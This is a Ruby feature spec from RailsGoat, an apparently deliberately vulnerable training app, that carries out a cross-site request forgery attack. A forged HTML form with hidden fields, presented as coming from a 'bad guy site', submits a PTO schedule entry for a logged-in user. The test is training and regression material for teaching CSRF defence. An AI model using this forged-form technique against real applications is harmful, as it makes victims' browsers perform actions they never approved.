cktricky
46 lines
1.5 KiB
Ruby
46 lines
1.5 KiB
Ruby
require 'spec_helper'
|
|
require 'tmpdir'
|
|
|
|
feature 'csrf' do
|
|
before do
|
|
UserFixture.reset_all_users
|
|
@normal_user = UserFixture.normal_user
|
|
end
|
|
|
|
scenario "attack\nTutorial: https://github.com/OWASP/railsgoat/wiki/R4-A8-CSRF", :js => true do
|
|
visit '/'
|
|
# TODO: is there a way to get this without visiting root first?
|
|
base_url = current_url
|
|
|
|
login @normal_user
|
|
|
|
Dir.mktmpdir do |dir|
|
|
hackety_file = File.join(dir, 'form.on.bad.guy.site.html')
|
|
post_url = "#{base_url}schedule.json"
|
|
File.open(hackety_file, 'w') do |f|
|
|
f.print <<-HTML
|
|
<html>
|
|
<body>
|
|
<form id='submit_me' action="#{post_url}" method="POST">
|
|
<input type="hidden" name="schedule[event_name]" value="Bad Guy" />
|
|
<input type="hidden" name="schedule[event_type]" value="pto" />
|
|
<input type="hidden" name="schedule[event_desc]" value="Fun Fun" />
|
|
<input type="hidden" name="date_range1" value="06/08/2013 - 06/09/2013" />
|
|
<input type="submit" value="Submit request" />
|
|
</form>
|
|
</body>
|
|
</html>
|
|
HTML
|
|
end
|
|
|
|
page.driver.visit "file://#{hackety_file}"
|
|
within('#submit_me') do
|
|
click_on 'Submit request'
|
|
end
|
|
end
|
|
|
|
pending if verifying_fixed?
|
|
expect(@normal_user.reload.paid_time_off.schedule.last.event_name).to eq('Bad Guy')
|
|
end
|
|
end
|